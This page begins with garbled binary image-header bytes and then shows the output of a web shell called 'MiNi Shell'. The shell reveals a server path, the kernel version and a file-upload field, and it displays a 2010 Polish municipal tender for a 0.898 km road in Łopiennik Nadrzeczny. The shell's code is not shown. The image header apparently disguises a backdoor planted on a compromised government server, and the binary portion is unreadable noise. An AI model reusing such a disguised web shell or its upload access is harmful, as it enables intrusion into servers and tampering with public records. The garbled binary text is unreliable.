JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/132994-N-2010.html

<p class="kh_header"><b>Łopiennik Górny: Budowa drogi gminnej w Łopienniku Nadrzecznym o łacznej długości 0,898 km</b><br>
<b>Numer ogłoszenia: 132994 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łopiennik Górny , Łopiennik Górny 1, 22-351 Łopiennik Górny, woj. lubelskie, tel. 082 5773123, faks 082 5773010.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi gminnej w Łopienniku Nadrzecznym o łacznej długości 0,898 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje budowę drogi gminnej w Łopienniku Nadrzecznym na 2 odcinkach /umownych/: od km 0+000.0 do km 0+157.00 oraz odcinek II: od km 0+000.00 do km 0+741.00, która polega na:
1)	odtworzeniu trasy w terenie;
2)	odtworzeniu punktów wysokościowych;
3)	poszerzeniu istniejącej jezdni;
4)	wzmocnieniu konstrukcji;
5)	budowy nowej nawierzchni;
6)	zapewnieniu prawidłowego odwodnienia drogi;
7)	montaż urządzeń bezpieczeństwa ruchu.
Wybór przyjętego rozwiązania technicznego oparty został o następujące założenia:
1)	spełnienie wymagań technicznych dla tej kategorii drogi,
2)	dostosowanie parametrów technicznych do aktualnego i prognozowanego ruchu /ilość i rodzaj pojazdów/,
3)	zapewnienie odpowiedniego poziomu bezpieczeństwa kierujących i pieszych,
4)	ekonomiczne przedsięwzięcia i dostosowanie do możliwości finansowych inwestora /faza budowy i utrzymania/.
Wybór rozwiązania technicznego ze względu na fakt budowy drogi po śladzie istniejącej drogi /bez skrzyżowań/ został ograniczony do wariantu zgodnego z opracowaną dokumentacją techniczną.
W ramach przedmiotowego projektu zostanie wykonany następujący zakres prac:
1)	poszerzenie jezdni do 5,50 m; wyrównanie istniejącej jezdni w przekroju poprzecznym i podłużnym;
2)	wzmocnienie istniejącej konstrukcji jezdni; budowa nowej nawierzchni;
3)	budowa chodników; korektę parametrów łuków poziomych;
4)	poprawę przekroju poprzecznego i podłużnego jezdni;
5)	utwardzenie istniejących zjazdów gospodarczych w poziomie chodnika.
Parametry drogi.
1.	Parametry podstawowe drogi:
1)	klasa drogi - D; długość odcinka drogi - 0,898 km, w tym:
a)	od 0+000,0 do km 0+157,00 /I odcinek/; 0+000,00 do km 0+741,00 km   /II odcinek/;
a)	szer. jezdni na prostej - od 5,00 m do 6,00 m;
b)	szer. pasów ruchu na wlotach- ok. 3,00 m; liczba pasów ruchu- 2;
c)	prędkość projektowa vp- 50 km/h; -przekrój jezdni - normalny szlakowy oraz półuliczny;
d)	obciążenie naw.- 100 kN/os.
2.	Konstrukcja nawierzchni
1)	nowa nawierzchnia jezdni - kostka brukowa - starobruk rzymski:
a)	8 cm- warstwa ścieralna z kostki brukowej; 
b)	3 cm- podsypka grysowa 2-4 mm;
c)	15 cm- podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie 0/31.5 mm;
d)	10 cm- warstwa z gruntu stabilizowanego cementem o RM=1.5 MPa;
2)	nowa nawierzchnia jezdni:
a)	4 cm - warstwa ścieralna z betonu asfaltowego o uziarnieniu 0/16 mm;
b)	20 cm- podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie 0/31.5 mm;
c)	10 cm- warstwa z gruntu stabilizowanego cementem o RM=1.5 MPa;
3)	konstrukcja chodnika - kostka brukowa :
a)	kostka brukowa - starobruk rzymski - odcinek współmierny do odcinka nawierzchni jezdni z kostki brukowej;
b)	3 cm - podsypka cementowo - piaskowa;
c)	10 cm- warstwa z gruntu stabilizowanego cementem o Rm=1.5Mpa;
4)	konstrukcja nawierzchni parkingu:
a)	8 cm- warstwa ścieralna z kostki betonowej;
b)	3 cm- podsypka z grysu 2-4 mm;
c)	15 cm- podbudowa zasadnicza z kruszywa łamanego stabilizowanego;
d)	10 cm- warstwa gruntu stabilizowanego cementem o RM=1,5 Mpa.
3.	Przepusty i zjazdy oraz odwodnienie:
a)	zjazdy z kostki betonowej; wjazdy o szerokości 5,0 m;
b)	obrzeże trawnikowe na zjazdach 8x30 cm;
c)	przecięcie krawędzi nawierzchni zjazdu i drogi wyokrąglone łukiem kołowymR=3.0 m R=6.0 m.;
d)	odwodnienie drogi gminnej zaprojektowano jako powierzchniowe z odprowadzeniem wód opadowych do rowów przydrożnych, przepustów oraz kratek ściekowych.
4.	Urządzenia bezpieczeństwa ruchu:
a)	ustawienie poręczy ochronnych;
b)	ustawienie barier ochronnych stalowych przekładowych.
Przeprowadzona analiza technologiczna wykazała, że przyjęte rozwiązania są zgodne z najlepszą praktyką w dziedzinie infrastruktury drogowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli nastąpi potrzeba na zadania nie przewidziane w projekcie</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-0, 45.22.11.00-3, 45.11.12.00-0, 45.11.12.20-6, 45.23.33.00-2, 45.11.27.30-1, 45.23.32.90-8, 52.23.31.29-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości 10  000,00  zł (słownie : Dziesięć tysięcy).

2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj. w:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie  kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez  podmioty , o których mowa w art. 6 b ust. 5 pkt 2 ustawy z 9 listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr  42, poz. 1158 z póź. zm. ).


3.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
       Bank Spółdzielczy w Krasnymstawie Oddział w Łopienniku Nadrzecznym   -                     Nr rachunku : 91 8200 1018 2002 1800 0172 0003

4.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.

5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  tj. Urząd Gminy Łopiennik Górny,                                         w kasie Urzędu (pok. Nr 6)   lub dołączyć do oferty.

6.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.   

7.	Wadium musi być zabezpieczone  na okres 30 dni, licząc od daty składania ofert - termin związania ofert.  Oferta zabezpieczona na okres krótszy niż  wymagany zostanie  odrzucona.
  
8.	Nie wniesienie wadium w terminie lub w innej formie niż określona w SIWZ spowoduje wykluczenie Wykonawcy na  podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Cena powinna być podana: cyfrowo i słownie w złotych polskich.      

2.	Oferowana cena powinna obejmować kompletne wykonanie przedmiotu zamówienia wraz z robotami nie ujętymi w  dokumentacji technicznej i  w przedmiarach, których  wykonanie niezbędne  jest   dla prawidłowego  wykonania  zadania  np. koszty robót  przygotowawczych,  koszty  urządzenia  placu budowy,   koszty   odszkodowań  za  zniszczenia w  terenie, a także ewentualne upusty proponowane  przez  Wykonawcę, tak aby była już ceną  ostateczną. Wykonawca zobowiązany  jest do wizyty miejsca realizacji robót  i jego otoczenia,  w celu oszacowania na własną  odpowiedzialność kosztów    i ryzyka  oraz uzyskania wszelkich danych, jakie  mogą być niezbędne w przygotowaniu oferty.   

3.	   Zaznacza  się,  że  wszystkie pozycje kosztorysów  muszą być bezwzględnie ujęte   i  wycenione.

4.                 Przy dokonywaniu oceny ofert stosowane będą następujące zasady:
           Kryterium:  cena oferty              Waga:          100%        
                     
   Punktacja obliczana będzie według wzoru: P1=(Cmin /C) x 100          
                      
                  Gdzie:      P1      -  ilość punktów obliczona dla kryterium cena oferty,
                                 Cmin  -  cena brutto najtańszej oferty,
                                 C     -  cena brutto rozpatrywanej oferty,
                               100    -  max ilość pkt</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania  przynajmniej 1 roboty  w zakresie budowy lub przebudowy drogi o   nawierzchni z masy  asfaltowej,  o dł. nie krótszej niż  1 km 
   0cena spełnienia warunku  nastąpi na  podstawie przedstawionych przez Wykonawcę informacji i  dokumentów o których mowa w punkcie  VI,  ppkt. 3  i  4  SIWZ;
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy  mogą  spełniać  łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest aby Wykonawca w oparciu o udostępnioną dokumentację  budowlaną oszacował na własną rękę, że spełnia warunek  dysponowania odpowiednim potencjałem technicznym   do wykonania  robót w niej wskazanych . 
    0cena spełnienia warunku nastąpi na podstawie oświadczenia Wykonawcy, o którym  mowa w punkcie  VI, ppkt 2  SIWZ oraz p.pkt. 6 jeżeli dotyczy ;
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy mogą  spełniać  łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie osób zdolnych do wykonania zamówienia    wymagane jest  wykazanie  przynajmniej jednej  osoby posiadającej  uprawnienia do kierowania  robotami budowlanymi  w  specjalności drogowej,  wykształcenie wyższe     z doświadczeniem w kierowaniu  budową dróg o nawierzchni  z masy  asfaltowej  przynajmniej na 2-ch zadaniach . 
Ocena spełnienia warunku  nastąpi na podstawie przedstawionych przez Wykonawcę informacji i dokumentów o których mowa w punkcie  VI, ppkt.  2  i  5  SIWZ oraz  ppkt 6  jeżeli dotyczy;  
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy mogą  spełniać  łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomiczno-finansowej wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności   cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia ;
   0cena spełnienia warunku  nastąpi na  podstawie przedstawionego przez Wykonawcę  oświadczenia i dokumentu o których  mowa w punkcie  VI,  ppkt 2  i  11  SIWZ;
 W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy mogą  spełniać  łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający bedzie żądał dokumentów potwierdzających jakość materiałów podczas realizacji zamówienia. Żądanie tekie będzie określone w umowie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lopiennikgorny.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 22-351 Łopiennik Górny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2010 godzina 10:00, miejsce: Urząd Gminy Łopiennik Górny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków przyznanych w ramach RPO WL na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com